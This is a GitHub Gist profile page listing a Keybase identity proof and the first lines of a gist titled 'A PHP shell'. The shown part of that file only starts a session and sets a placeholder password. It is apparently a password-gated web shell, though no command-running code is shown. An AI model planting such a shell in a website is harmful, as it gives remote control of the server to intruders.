Skip to content

Instantly share code, notes, and snippets.

View ElliNet13's full-sized avatar

ElliNet13 ElliNet13

View GitHub Profile
@ElliNet13
ElliNet13 / keybase.md
Created March 12, 2024 10:42
For Keybase

Keybase proof

I hereby claim:

  • I am ellinet13 on github.

  • I am ellinet13 (https://keybase.io/ellinet13) on keybase.

  • I have a public key ASCzK9CvF6rkwfrg6lkCWhT4Wdbz73-l96Xj_bOheH0cNQo

@ElliNet13
ElliNet13 / shell.php
Created May 28, 2024 23:22
A PHP shell
<?php
// Start session
session_start();
// Set your desired password here
$password = "password_goes_here";